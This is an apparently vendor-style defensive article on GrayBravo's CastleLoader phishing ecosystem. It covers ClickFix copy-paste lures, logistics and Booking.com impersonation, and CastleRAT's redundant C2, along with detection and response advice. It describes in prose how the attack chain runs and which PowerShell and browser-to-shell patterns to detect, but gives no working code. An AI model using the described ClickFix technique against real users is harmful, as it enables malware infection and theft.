AI Defense Against CastleLoader MaaS Phishing

Most companies still treat phishing as an “email problem.” GrayBravo’s CastleLoader ecosystem shows why that mindset is getting expensive.

Recorded Future’s latest research breaks GrayBravo (formerly TAG-150) into four distinct activity clusters that all use CastleLoader, but with different lures, infrastructure, and payloads. That’s the signature of a malware-as-a-service (MaaS) business: the “product” stays consistent while the “customers” tailor campaigns to their niche. For defenders, it means your threat model can’t stop at “block the bad domain.” You need to recognize patterns across campaigns, even when every indicator changes.

This installment in our AI in Cybersecurity series focuses on a practical reality: AI-powered threat detection is built for problems like CastleLoader—high-churn infrastructure, social engineering that shifts weekly, and multi-stage payload chains that don’t look identical twice.

What GrayBravo’s CastleLoader clusters tell us about MaaS

Answer first: When one malware family shows up in multiple campaign styles with minimal overlap in infrastructure, you’re not fighting a single actor—you’re fighting an ecosystem.

Recorded Future identified four CastleLoader activity clusters, each with distinct targeting and delivery:

• TAG-160 (Logistics-focused): Logistics brand impersonation, freight-themed lures, and the ClickFix “copy/paste this command” technique.
• TAG-161 (Booking.com-themed): Booking.com impersonation, ClickFix delivery, and observed delivery of Matanbuchus (itself a paid MaaS downloader).
• Cluster 3 (Booking.com-themed, separate): Similar lure theme, but different plumbing—uses Steam Community profiles as a dead drop resolver to dynamically update C2.
• Cluster 4 (Malvertising/fake software): Fake installers and update prompts (including impersonated admin tools), sometimes with signed MSI packages.

The through-line is CastleLoader: a loader that opens the door for second-stage malware like CastleRAT, infostealers (for example, Rhadamanthys), or commodity RATs. That’s why MaaS is so effective: defenders spend time on the “front door,” while attackers monetize what happens after entry.

Why this matters operationally

Answer first: MaaS forces defenders to prioritize behavior and relationships over single indicators.

If you’re relying on static deny-lists, MaaS will outrun you. GrayBravo’s ecosystem shows:

• High indicator churn: domains rotate, hosting shifts, and legitimate internet services can be abused.
• Multi-tier infrastructure: Tiered servers (including backup tiers) reduce takedown impact.
• Flexible payloading: different operators deliver different second stages depending on the victim and objective.

AI-based systems earn their keep here because they can correlate weak signals—naming patterns, hosting ASNs, redirect infrastructure, endpoint behaviors—into a stronger verdict.

ClickFix is winning because it weaponizes your users’ “helpfulness”

Answer first: ClickFix works because it turns security controls into “instructions,” getting users to execute the attacker’s command for them.

A big theme across the logistics and Booking.com clusters is ClickFix: victims land on a page that looks like a business workflow (sign a document, verify a guest booking, confirm a rate) and are told to copy/paste a command to “fix” a viewing or signing issue.

That’s not a gimmick. It’s a strategy that:

• Bypasses attachment scanning (no attachment)
• Reduces reliance on macro-enabled documents
• Evades some link scanners (the payload happens after interactive steps)
• Shifts execution to native tooling (often PowerShell)

In TAG-160’s logistics flow, the copied command can download an archive, extract it, and run malware via pythonw.exe while presenting a decoy message. The result is a loader-driven pipeline: CastleLoader first, then whatever the operator wants next.

What AI can detect that rule-based filters often miss

Answer first: AI performs best when the attacker’s “shape” repeats but their content changes.

Here are detection points where AI-driven anomaly detection and classification can outperform brittle signatures:

• Unusual user journeys: email → landing page → form submission → copy/paste command. This is rare in legitimate business processes and can be modeled.
• Copy/paste execution events: endpoint telemetry showing a browser session followed by PowerShell execution with web download and archive extraction.
• Living-off-the-land misuse: suspicious combinations like powershell + download + execution + Defender exclusion attempts.
• Cross-campaign reuse: domain registration patterns (typosquats, re-registered domains) and repeated hosting/provider preferences.

A good stance: treat ClickFix as a process anomaly, not merely a phishing lure.

The logistics angle: when cybercrime starts steering real cargo

Answer first: Logistics-targeted malware isn’t just about credentials—it can enable fraud and physical theft.

TAG-160 is notable because it doesn’t “spray and pray.” It mimics how logistics teams actually work: freight quotes, rate confirmations, load scheduling, and platform-based outreach.

The report describes tactics that should make any transportation or supply chain leader uncomfortable:

• Impersonation of known logistics firms using spoofed senders and typosquatted domains
• Abuse of freight-matching platforms (DAT Freight & Analytics and Loadlink) to add legitimacy and source targets
• Re-registration of previously legitimate logistics domains to inherit trust

This blends with a broader trend highlighted in 2024–2025 research: cyber access enabling shipment hijacking. Once an attacker has foothold or platform access, they can alter communications, redirect pickups, or insert fraudulent instructions.

Practical defense moves for logistics and supply chain organizations

Answer first: You need platform governance plus endpoint containment—email security alone won’t cover this.

If you support logistics operations (or depend on them), prioritize controls that match this threat:

1. Platform account hardening: enforce MFA, monitor new account creation, watch for profile changes, and restrict third-party access.
2. Business process verification: for load changes or new banking details, require out-of-band verification (not email-thread replies).
3. Endpoint guardrails: block or restrict PowerShell for non-admin users; monitor for scripting from browser-launched processes.
4. AI-driven behavioral detections: alert on copy/paste-to-terminal behaviors and sudden spikes in outbound connections after “document signing.”

In my experience, the fastest win is building detections around workflow anomalies—security teams can tune those with far less noise than generic “phishing” alerts.

Booking.com lures + mailer tooling: attackers are professionalizing the funnel

Answer first: The Booking.com clusters show phishing is now managed like marketing—dashboards, redirects, SMTP pools, proxies, and testing.

TAG-161 doesn’t just send emails; it appears to run phishing with dedicated email and redirect management panels (with Russian-language titles such as “Email Manager” and “Redirect and Email Manager”). Functionality observed includes SMTP configuration, redirect generation, proxy management, worker threads, and logging.

That detail matters because it changes how you should defend:

• You’re not dealing with a single inbox sending a few messages.
• You’re dealing with a campaign platform—and campaign platforms produce repeatable infrastructure patterns.

The report also notes infrastructure concentration in specific ASNs (including those linked by other researchers to bulletproof hosting ecosystems). Even when domains rotate, hosting and operational habits often persist long enough for correlation.

Where AI-driven threat intelligence fits

Answer first: AI is most effective when it fuses weak signals across email, network, identity, and endpoint data.

A practical AI-in-cybersecurity application here is entity resolution:

• Connecting a set of lookalike domains to shared registration patterns
• Connecting redirector infrastructure to mailer panel fingerprints
• Connecting endpoints that show ClickFix execution patterns to known CastleLoader behaviors

Instead of asking “Is this domain malicious?” you ask “Is this activity consistent with the CastleLoader ecosystem?” That shift is the difference between chasing IoCs and breaking campaigns.

CastleRAT and multi-C2 redundancy: assume the attacker planned for takedowns

Answer first: GrayBravo-associated tooling is built to survive disruption, so your response plan must be equally resilient.

CastleRAT, delivered as a second stage, includes variants in C and Python and communicates using a custom protocol with RC4 encryption and hard-coded keys. Recorded Future observed victims communicating with multiple C2 servers nearly simultaneously, implying deliberate redundancy.

Operationally, that means:

• Blocking one C2 may not stop command-and-control.
• Incident response should hunt for behavioral evidence and persistence, not just known IPs.
• Your detection program should model multi-destination C2 patterns as suspicious, especially when paired with loader behavior.

AI can help by clustering outbound traffic patterns: “new host → new domain → new IP → repeated connections on unusual cadence,” even when each individual destination looks unremarkable.

A realistic detection and response playbook for CastleLoader-style threats

Answer first: The fastest path to better outcomes is combining AI triage with a few opinionated controls.

Here’s a field-tested set of steps that map well to CastleLoader, ClickFix, and loader-driven infections:

1) Prevent the copy/paste execution path

• Restrict PowerShell to signed scripts where feasible
• Enable tamper protection and monitor for Defender exclusion attempts
• Alert on browser-to-shell parent/child process chains

2) Use AI to reduce alert fatigue, not replace analysts

• Auto-cluster alerts by campaign traits (lure theme, redirect patterns, hosting ASN)
• Prioritize incidents where email + web + endpoint telemetry align into a single narrative
• Summarize incidents into analyst-ready timelines (user action → execution → payload → C2)

3) Harden identity and monitor exfiltration

• Watch for credential theft indicators (new logins, impossible travel, new OAuth grants)
• Monitor outbound traffic to suspicious infrastructure and unusual legitimate services used as staging

4) Treat IoCs as “freshness-limited”

• Keep blocklists, but assume they expire quickly
• Focus on detections that survive infrastructure changes: ClickFix execution flow, loader patterns, multi-C2 behavior

A useful rule of thumb: If the attacker can change it in an afternoon, don’t build your whole defense on it.

What to do next (and what to ask your security team)

CastleLoader’s spread across multiple industries is the point. MaaS makes sophisticated tooling accessible to more operators, and operators are getting better at business-specific deception—logistics today, hospitality tomorrow, something else next quarter.

If you’re evaluating AI in cybersecurity tools, push past “does it detect malware?” and ask:

• Can it correlate email, web, endpoint, and network signals into one incident?
• Can it cluster related activity across rotating domains and IPs?
• Can it explain why it flagged an event, in plain language your team can act on?

If you want a practical starting place, begin with one measurable outcome: reduce time-to-triage for phishing-driven endpoint execution. CastleLoader-style threats thrive in the gap between “user clicked” and “security noticed.” AI can shrink that gap—fast—when it’s deployed against the right behaviors.

Where do you think your organization is most exposed right now: email workflows, endpoint scripting controls, or identity compromise after the initial infection?